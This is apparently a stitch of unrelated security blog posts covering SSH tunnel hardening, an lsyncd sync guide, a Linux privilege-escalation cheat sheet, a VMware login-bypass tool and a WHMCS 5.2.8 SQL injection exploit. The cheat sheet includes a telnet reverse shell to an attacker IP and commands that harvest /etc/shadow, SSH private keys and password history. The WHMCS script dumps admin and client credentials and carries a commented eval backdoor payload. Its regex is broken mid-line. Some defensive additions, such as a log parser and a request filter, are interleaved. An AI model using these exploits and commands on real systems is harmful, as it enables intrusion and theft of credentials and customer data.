Keep an Eye on SSH Forwarding!

OpenSSH is a wonderful toolbox. Its main purpose is to establish encrypted connections (SSH means Secure SHell) to a remote UNIX machine and, once authenticated, to spawn a shell to perform remote administration. Running on port 22 (default), the client (ssh) and the server (sshd) exchange encrypted information (what you type and the result of your command). I won’t review the long list of options available with SSH; let’s focus on one particular feature: tunneling.

By default, sshd (the server) has the flag AllowTcpForwarding turned on (I won’t start a debate here about this default setting). “TCP Forwarding” allows you to encapsulate any other protocol (based on TCP of course) inside an already established SSH connection. It’s very useful to increase the security of any unsecured protocol exchanging data in clear text (example: to check a mailbox via the POP3 or IMAP protocol). TCP Forwarding is also a common way to “hide” your activity on the network. Here is an example:

# ssh -f -N -L 1100:localhost:110 user@pop3.company.com
user@pop3.company.com's password: 
# telnet localhost 1100
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
+OK Solid POP3 server ready
quit
+OK session ended
Connection closed by foreign host.

If you want to read more about tunnels, check the following tutorial.

But the ssh client has a much more interesting feature: dynamic port forwarding. When you connect to the remote host and specify a “-D” argument, the remote ssh server acts as a SOCKS proxy! Example:

# ssh -f -N -D 9999 user@server.company.com

From now on, all applications compatible with SOCKS proxies can use the proxy running on 127.0.0.1:9999! Here is an example with Firefox:

[Screenshot: Firefox proxy settings]

Configured like this, Firefox will send all HTTP traffic through the remote server via the SSH session. The server will connect to the final website and send the HTTP requests. Really nice! But there are some security concerns:

  • The UNIX server will generate a lot of traffic from the Internet. There is a risk of high resource consumption (bandwidth and/or CPU).
  • As connections will originate from the UNIX server itself, the IP address logged by remote services will be that of the UNIX server. There is a risk in case of abuse (hidden IP address).
  • By default, the SSH daemon permits all protocols to be forwarded. Some users may bypass your security policy by encapsulating unexpected protocols (instant messaging is a good example).

Here are some steps to use SSH tunnels in a safe way. First of all, if you don’t really need this feature, disable it! In /etc/ssh/sshd_config, set AllowTcpForwarding to no and restart the sshd process.

Logging

By default, the SSH daemon does not log the sessions established via a tunnel. To show them, you need to run the sshd in debug mode (-d). This is not acceptable in an operational environment. Here is a quick patch to log all outgoing sessions initiated by the sshd with a mapping to the UID (UserID). In serverloop.c, patch the function server_request_direct_tcpip() like this:

915,918d914
<  // BEGIN PATCH TunnelLogging
<  uid_t who;
<  // END PATCH
<
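Review bot: the TunnelLogging markers sit on the "<" side of this 915,918d914 hunk, so the diff was generated patched-versus-original and cannot be applied as-is without reversing it. Regenerate it in the other direction, ideally as a unified diff with context lines, so the position inside server_request_direct_tcpip() is visible. The separate "uid_t who;" declaration added here is only needed because the second hunk stores getuid() before logging; passing the value directly to logit() would make this hunk unnecessary.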
925,930c921,922
<  // BEGIN PATCH TunnelLogging
<  // debug("server_request_direct_tcpip: originator %s port %d, target %s port %d",
<  who = getuid();
<    logit("Tunnel: %s:%d -> %s:%d UID(%d)",
<      originator, originator_port, target, target_port, who);
<  // END PATCH
---
>  debug("server_request_direct_tcpip: originator %s port %d, target %s port %d",
>      originator, originator_port, target, target_port);
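Review bot: in the logit() call, "who" is a uid_t but is formatted with %d; the width and signedness of uid_t vary by platform, so cast explicitly, for example (unsigned int)who with %u. The original debug() call is also left half commented-out: only its first line survives, as a // comment, and its argument line is gone. Either keep the complete debug() call next to the new logit() or delete it cleanly. It would also help to document that getuid() reports the UID of the sshd process handling the channel, since that is what the UID(...) field in the log line means.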

For each new TCP session, the following line will be sent to Syslog:

Feb 27 08:03:08 honey sshd[9060]: Tunnel: 127.0.0.1:51209 -> 0.channel26.facebook.com:80 UID(2349)

The patch makes it possible to correlate who connected and from which IP address.
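One way to put these log lines to work, as an added example (not part of the original article or of OpenSSH): a parser for the patched "Tunnel:" lines that reports destinations outside an allowlist and attributes each one to the user's most recent login. The log lines, the allowlist and the UID-to-user map are constructed; the "Accepted ..." line is sshd's standard login message.

```python
import re

# Line format written by the logit() call in the patch above.
TUNNEL_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]{8}) \S+ sshd\[\d+\]: Tunnel: "
    r"(?P<src>\S+):(?P<sport>\d+) -> (?P<dst>\S+):(?P<dport>\d+) "
    r"UID\((?P<uid>\d+)\)\s*$"
)
# Stock sshd login line, used to recover the client's source address.
ACCEPT_RE = re.compile(
    r"sshd\[\d+\]: Accepted \S+ for (?P<user>\S+) from (?P<ip>\S+) port \d+"
)

# Constructed sample log. IPv6 hosts contain colons, so host and port are
# split on the LAST colon (the greedy \S+ in TUNNEL_RE does this).
SAMPLE_LOG = """\
Feb 27 08:01:10 honey sshd[9041]: Accepted password for john from 203.0.113.7 port 40112 ssh2
Feb 27 08:03:08 honey sshd[9060]: Tunnel: 127.0.0.1:51209 -> 0.channel26.facebook.com:80 UID(2349)
Feb 27 08:03:09 honey sshd[9060]: Tunnel: 127.0.0.1:51210 -> 192.168.0.1:443 UID(2349)
Feb 27 08:05:30 honey sshd[9102]: Accepted publickey for andy from 198.51.100.23 port 51522 ssh2
Feb 27 08:05:44 honey sshd[9120]: Tunnel: ::1:40022 -> 2001:db8::25:25 UID(2350)
"""
# Assumed policy and account data (in production: PermitOpen list, /etc/passwd).
ALLOWED = {("192.168.0.1", 443)}
UID_TO_USER = {2349: "john", 2350: "andy"}


def unexpected_tunnels(log_text, allowed, uid_to_user):
    """Return one record per Tunnel line whose destination is not allowed."""
    last_login_ip = {}   # user -> source IP of the most recent accepted login
    findings = []
    for line in log_text.splitlines():
        login = ACCEPT_RE.search(line)
        if login:
            last_login_ip[login["user"]] = login["ip"]
            continue
        tun = TUNNEL_RE.match(line)
        if not tun:
            continue
        dest = (tun["dst"].lower(), int(tun["dport"]))
        if dest in allowed:
            continue
        uid = int(tun["uid"])
        user = uid_to_user.get(uid, "uid:%d" % uid)
        findings.append({
            "time": tun["ts"],
            "uid": uid,
            "user": user,
            # Heuristic: attribute the tunnel to the user's latest login.
            "client_ip": last_login_ip.get(user, "unknown"),
            "dest_host": dest[0],
            "dest_port": dest[1],
        })
    return findings


if __name__ == "__main__":
    for f in unexpected_tunnels(SAMPLE_LOG, ALLOWED, UID_TO_USER):
        print("{time} {user} (from {client_ip}) -> {dest_host}:{dest_port}".format(**f))
```

Attribution by "latest login of that user" is a heuristic; when the same account is logged in from several addresses at once, all of its recent source addresses should be reviewed.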

Restricting the allowed ports

By default, sshd allows TCP sessions to be forwarded to any port. You can restrict forwarding to specific hosts and/or ports via the PermitOpen parameter (available since release 4.4):

PermitOpen host:port
PermitOpen IPv4_addr:port
PermitOpen [IPv6_addr]:port

Another alternative is to use the local firewall – iptables – to restrict connections initiated by the UNIX server.

Restricting the allowed users or groups

Now that hosts and ports are restricted, it can be useful to restrict who can use the port forwarding feature. Back to the sshd_config man page, let’s have a look at the Match keyword:

Introduces a conditional block. If all of the criteria on the Match line are satisfied, the keywords on the following lines override those set in the global section of the config file, until either another Match line or the end of the file. The arguments to Match are one or more criteria-pattern pairs. The available criteria are User, Group, Host, and Address. Only a subset of keywords may be used on the lines following a Match keyword. Available keywords are AllowTcpForwarding, Banner, ForceCommand, GatewayPorts, GSSApiAuthentication, KbdInteractiveAuthentication, KerberosAuthentication, PasswordAuthentication, PermitOpen, RhostsRSAAuthentication, RSAAuthentication, X11DisplayOffset, X11Forwarding, and X11UseLocalHost.

Here are some examples. First let’s restrict the users who are allowed to forward TCP sessions:

AllowTcpForwarding no
Match User john,andy,ted
    AllowTcpForwarding yes

Or better, allow specific ports per user group:

AllowTcpForwarding no
Match Group admins
    AllowTcpForwarding yes
Match User john,andy,ted
    AllowTcpForwarding yes
    PermitOpen 192.168.0.1:443

With this configuration, administrators will be able to open unrestricted connections, specific users will be able to open an IMAP session to a single server and all remaining users won’t be allowed to create tunnels.

Restricting the server Internet connectivity

Finally, restrict the Internet connectivity of your server! Even if you don’t allow TCP Forwarding, it’s a good idea. A server should never have full, direct Internet connectivity. Close everything and open connectivity according to need (example: downloading patches via HTTP(S) from specific servers).

Syncing local and remote directories with lsyncd

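There are many ways and tools to automatically sync a directory on a local server (or VPS) to one or more remote servers. The simplest is probably rsync + cron (see: Mirroring a blog with a VPS). The problem with this approach is that cron can only invoke rsync at fixed intervals: if the interval is too short, frequent rsync runs add load to the server; if it is too long, data may not be synced in time. lsyncd, introduced here, uses the inotify mechanism of the Linux kernel (2.6.13 and later), which makes it possible to sync only when needed (when something changes). lsyncd closely watches the reference directory on the local server; when it detects that a file or directory under it has changed, it immediately notifies the remote server and syncs the files via rsync or rsync+ssh. By default lsyncd triggers a sync every 20 seconds or once 1000 write events have accumulated; this trigger condition can of course be adjusted through configuration parameters.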

lsyncd is already in Ubuntu's official repositories, so installation is easy:

$ sudo apt-get update
$ sudo apt-get install lsyncd

After installation, lsyncd does not automatically create the configuration file and directories it needs, so create them by hand:

$ sudo mkdir /etc/lsyncd
$ sudo touch /etc/lsyncd/lsyncd.conf.lua

$ sudo mkdir /var/log/lsyncd
$ sudo touch /var/log/lsyncd/lsyncd.{log,status}

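Configure lsyncd. Note the source, host and targetdir entries: in order, the local directory to sync to the remote side (the source), the IP of the remote machine, and the remote directory (the target):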

$ sudo vi /etc/lsyncd/lsyncd.conf.lua
settings {
        logfile = "/var/log/lsyncd/lsyncd.log",
        statusFile = "/var/log/lsyncd/lsyncd.status"
}

sync {
        default.rsyncssh,
        source = "/home/vpsee/local",
        host = "192.168.2.5",
        targetdir = "/remote"
}

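Set up passwordless ssh login for the root account from the local machine to the remote machine, and create a /remote directory on the remote machine (assumed IP: 192.168.2.5):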

$ sudo su
# ssh-keygen -t rsa
# ssh-copy-id root@192.168.2.5

# ssh 192.168.2.5
# mkdir /remote

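Once configured, start the lsyncd service on the local machine. After it starts, the directories under /home/vpsee/local on the local machine are automatically synced to /remote on the remote machine: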

$ sudo service lsyncd restart

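Besides syncing a local directory to a remote directory, lsyncd can just as easily sync a local directory to another local directory; only the configuration file needs to change: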

$ sudo vi /etc/lsyncd/lsyncd.conf.lua
settings {
        logfile = "/var/log/lsyncd/lsyncd.log",
        statusFile = "/var/log/lsyncd/lsyncd.status"
}

sync {
	default.rsync,
	source = "/home/vpsee/local",
	target = "/localbackup"
}

$ sudo service lsyncd restart

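Automated local information gathering tool for Linux hosts (a must-have for penetration testing)

LinEnum is a shell script that automatically extracts local information from a Linux host. It performs more than 65 security checks, such as potential SUID/GUID files and Sudo/rhost misconfigurations. The script can also search *.conf and *.log files by keyword (for example, Password). These features are very useful for penetration testers.

Main features:

1. Kernel and distribution version
2. System information:
   Hostname
3. Network information:
   IP
   Routing information
   DNS server information
4. User information:
   Current user information
   Recently logged-in users
   Enumeration of all users, including uid/gid information
   List of root accounts
   Check for hashes in /etc/passwd
   Current user's history files (i.e. .bash_history, .nano_history etc.)
5. Version information:
   Sudo
   MYSQL
   Postgres
   Apache

Download link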

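Methods and ways to obtain sensitive information after Linux privilege escalation

Before starting, I would like to point out that I am no expert. As far as I know, there is no "magic" answer in this huge area. Sharing is my starting point. What follows is a mix of commands that do the same thing in different places, or that simply look at things from a different angle. I know there is more "stuff" to look for. This is only a basic, rough guide. Not every command will apply, so pay attention to the details.

Each line in this article is one command. Some of them may not work on your host, because they may be commands used on other Linux distributions.

Enumeration key points
What (Linux) privilege escalation is all about:

  • Collect – enumeration, enumeration and some more enumeration.
  • Process – sort through the data, analyse and prioritise.
  • Search – know what to search for and where to find the exploit code.
  • Adapt – customise the exploit so that it fits. Not every exploit works "as is" on every system.
  • Try – be prepared for trial and error.
  • Operating system

What is the operating system type and version?

cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release

What is its kernel version?

cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz

What is in its environment variables?

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Is there a printer?

lpstat -a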

  • Applications and services

What services are running? Which service has which user privilege?

ps aux
ps -ef
top
cat /etc/services

Which services are running as root? Of these, which look vulnerable? Check them again!

ps aux | grep root
ps -ef | grep root

What applications are installed? What versions are they? Which are currently running?

ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archives
ls -alh /var/cache/yum/

Service settings: is anything misconfigured? Are any (vulnerable) plugins attached?

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'

What jobs are scheduled on the host?

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

What plain-text usernames and passwords might be on the host?

grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password'   # Joomla

  • Communications and networking

What NIC(s) does the system have? Which network is it connected to?

/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

What are the network configuration settings? What kind of servers are on the network? DHCP server? DNS server? Gateway?

cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname

Which other users and hosts are communicating with the system?

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w

What is cached? IP and/or MAC addresses?

arp -e
route
/sbin/route -nee

Is packet sniffing possible? What can be seen? Listening to traffic

# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21

How do you get a shell? How do you interact with the system?

# http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/

nc -lvp 4444    # Attacker. Input (commands)
nc -lvp 4445    # Attacker. Output (results)

telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445    # On the target system. Use the attacker's IP!

How to port forward? (port redirection)

# rinetd

# fpipe

# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

# ssh

# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7    # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7    # Remote Port

# mknod

# mknod backpipe p ; nc -l -p [remote port] < backpipe  | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe    # Port Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)

Is tunnelling possible? Sending commands locally and remotely

ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig

  • Confidential information and users

Who are you? Which id is logged in? Who is already logged in? Who else is here? Who can do what?

id
who
w
last
cat /etc/passwd | cut -d: -f1    # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
cat /etc/sudoers
sudo -l

What sensitive files can be found?

cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

Is there anything interesting in the home directorie(s)? If access is permitted

ls -ahlR /root/
ls -ahlR /home/

Are there any passwords, scripts, databases, configuration files or log files? Default paths and locations for passwords

cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

What has the user been doing? Are there any passwords? What have they edited?

cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

What user information can be found?

cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root

Can private-key information be found?

cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key

  • File systems

Which users can write configuration files in /etc/? Can a service be reconfigured?

ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null        # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null    # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null          # Other

find /etc/ -readable -type f 2>/dev/null                         # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone

What can be found in /var/?

ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases

Any hidden settings/files on the website? Any configuration files with database information?

ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/

What is in the log files? (Anything that could help with "local file inclusion"?)

# http://www.thegeekstuff.com/2011/08/linux-var-log-files/

cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log

ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp (what files are there? log. system boot......)

If commands are restricted, which ones can you use to break out of the restriction?

python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i

How are file systems mounted?

mount
df -h

Are there any mounted file systems?

cat /etc/fstab

What "advanced Linux file permissions" are in use? Sticky bits, SUID and GUID

find / -perm -1000 -type d 2>/dev/null    # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it.
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

# find starting at root (/), SGID or SUID, not symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)

find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

Which directories can be written to and executed from? A few "common" places: /tmp, /var/tmp, /dev/shm

find / -writable -type d 2>/dev/null        # world-writeable folders
find / -perm -222 -type d 2>/dev/null      # world-writeable folders
find / -perm -o+w -type d 2>/dev/null    # world-writeable folders
find / -perm -o+x -type d 2>/dev/null    # world-executable folders
find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null   # world-writeable & executable folders

Any "problem" files? Writable and "unused" files

find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writeable files
find /dir -xdev \( -nouser -o -nogroup \) -print   # No-owner files

  • Preparing and finding exploit code

What development tools/languages are installed/supported?

find / -name 'perl*'
find / -name 'python*'
find / -name 'gcc*'
find / -name cc

How can files be uploaded?

find / -name wget
find / -name 'nc*'
find / -name 'netcat*'
find / -name 'tftp*'
find / -name ftp

Finding exploit code

http://www.exploit-db.com

http://1337day.com

http://www.securiteam.com

http://www.securityfocus.com

http://www.exploitsearch.net

http://metasploit.com/modules/

http://securityreason.com

http://seclists.org/fulldisclosure/

http://www.google.com

Finding more information about a vulnerability

http://www.cvedetails.com

http://packetstormsecurity.org/files/cve/[CVE]

http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]

http://www.vulnview.com/cve-details.php?cvename=[CVE]

http://www.91ri.org/

(Quick) "common" exploits, pre-compiled binaries

http://tarantula.by.ru/localroot/

http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/

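Is the information above too hard?

Go and try a third-party script/tool!

How is the system kept up to date with the latest patches for the kernel, operating system, all applications, plugins and web services?

apt-get update && apt-get upgrade
yum update

What is the minimum privilege a service needs in order to run?

For example, do you need to run MySQL as root?

Can scripts that run automatically be found on the following sites?!

unix-privesc-check

http://labs.portcullis.co.uk/application/enum4linux/

http://bastille-linux.sourceforge.net

  • (Quick) guides and links

For example

http://www.0daysecurity.com/penetration-testing/enumeration.html

http://www.microloft.co.uk/hacking/hacking3.htm

Other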

http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf

http://pentest.cryptocity.net/files/clientsides/post_exploitation_fall09.pdf

http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html


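VMInjector: a tool for bypassing login authentication on VMware virtual machines

VMInjector is a tool for bypassing the login authentication of virtual machines running on VMware Workstation/Player. It supports most current mainstream operating systems. It works by manipulating memory directly to bypass login authentication, so this in-memory patch is not persistent: after the virtual machine restarts, normal password verification is restored.

Prerequisites:

1. The host must run Windows (with administrator privileges)
2. The virtualization software is VMware Workstation or Player
3. A locked virtual machine is present

Supported versions:

The host may be 32-bit or 64-bit Windows; supported guests are Win7, Win XP, Mac OS X and most versions of Ubuntu.

Tested successfully on a 64-bit Win7 host with VMware 7.1.0 and a 32-bit XP guest.

Download link

Testing notes:

The source provided on GitHub uses a Python script to inject the DLL. I used Python 2.7.5 with psutil 1.1 (the latest version) and ran into insufficient-permission problems when enumerating the host's processes (possibly a psutil problem?). Injection also failed in every one of several tests. I later found that the author used compiled exe files in the demo on his blog. These two exe files were also on GitHub, but the author later deleted them; I don't know why.

So you need to roll back to the previous version on GitHub to get the exe files.

git clone https://github.com/batistam/VMInjector
cd VMInjector
git rebase -i HEAD~2    # in the editor, delete the second line of text!!!

The goal is to undo the most recent commit, which brings back the deleted exe files.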

root@bt:~/VMInjector# ls
LICENSE  README  vminjector  vminjector-src
root@bt:~/VMInjector# git rebase -i HEAD~2
Successfully rebased and updated refs/heads/master.
root@bt:~/VMInjector# 
root@bt:~/VMInjector# 
root@bt:~/VMInjector# ls
LICENSE  vminjector            vminjector64-exe.rar
README   vminjector32-exe.rar  vminjector-src

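Usage: run it from the command line, select the virtual machine to unlock, then select the operating system version. After that, just press Enter at the virtual machine's login screen; you can log in without a password.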

WHMCS 5.2.8 EXP

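The programs (methods) provided on this site may be offensive in nature; they are for security research and teaching only. Use at your own risk!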
#!/usr/bin/env python
# 2013/10/18 - WHMCS <=5.2.8 SQL Injection # http://localhost.re/p/whmcs-528-vulnerability

url = 'http://client.target.com/'

import urllib, re, sys
from urllib2 import Request, urlopen
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

def exploit(sql):
    sqlUnion = '-1 union select 1,0,0,0,0,0,0,0,0,0,0,%s,0,0,0,0,0,0,0,0,0,0,0#' % sql
    print "Doing stuff: %s" % sqlUnion
    #you could exploit any file that does a select, I randomly chose viewticket.php
    r = urlopen(Request('%sviewticket.php' % url, data="tid[sqltype]=TABLEJOIN&tid[value]=%s" % sqlUnion, headers={"User-agent": ua})).read()
    return re.search(r'

(.*?)

', r, re.DOTALL).group(1).strip()

#get admins
print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)')

#get users
count = int(exploit('(SELECT COUNT(id) FROM tblclients)'))
print "User count %d" % count
for i in range(count):
    print exploit('(SELECT CONCAT(id,0x3a,firstname,0x3a,lastname,0x3a,address1,0x3a,address2,0x3a,city,0x3a,country,0x3a,ip,0x3a,email,0x3a,password) FROM tblclients LIMIT %d,1)' % i)

#are you evil? yes, you are!
#php = "1';eval($_REQUEST['lol_whmcs']);#"
#r = urlopen(Request('%sadmin/licenseerror.php?updatekey=true&whitelisted=1&newlicensekey=%s&match=1&username[sqltype]=TABLEJOIN&username[value]=-1||1=1%%23' % (url, urllib.quote_plus(php)), headers={"User-agent": ua})).read()
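
A defender-side counterpart, added here and not part of the original post: the script above carries its payload in array-style fields named tid[sqltype] and username[sqltype], so a request filter or log check can flag any field of that shape, whether it arrives in the query string or in a form body. The sample requests are constructed, and the check assumes that legitimate clients of the application never send name[sqltype] fields.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameter names shaped like name[sqltype], as sent by the script above
# (tid[sqltype], username[sqltype]). Matched after URL-decoding.
SQLTYPE_KEY = re.compile(r"^(?P<name>[^\[\]]+)\[\s*sqltype\s*\]$", re.IGNORECASE)


def sqltype_params(url, body=""):
    """Return (location, parameter, sqltype value) for every name[sqltype]
    field found in the URL query string or a form-encoded body."""
    hits = []
    for location, encoded in (("query", urlsplit(url).query), ("body", body)):
        # parse_qsl percent-decodes, so tid%5Bsqltype%5D is caught as well.
        for key, value in parse_qsl(encoded, keep_blank_values=True):
            m = SQLTYPE_KEY.match(key.strip())
            if m:
                hits.append((location, m["name"], value))
    return hits


# Constructed sample requests: (url, form body). Values are placeholders.
SAMPLE_REQUESTS = [
    ("/viewticket.php?tid=ABC-123456&c=k3yv4lue", ""),
    ("/viewticket.php", "tid%5Bsqltype%5D=TABLEJOIN&tid%5Bvalue%5D=x"),
    ("/admin/licenseerror.php?match=1&username[sqltype]=TABLEJOIN&username[value]=x", ""),
    ("/clientarea.php", "firstname=Ann&sqltype=standard"),
]

if __name__ == "__main__":
    for url, body in SAMPLE_REQUESTS:
        for location, name, value in sqltype_params(url, body):
            print("ALERT %s: %s[sqltype]=%s in %s"
                  % (url.split("?")[0], name, value, location))
```

Form bodies are not written to ordinary access logs, so this check belongs in a reverse proxy, WAF hook or application middleware that sees the POST data.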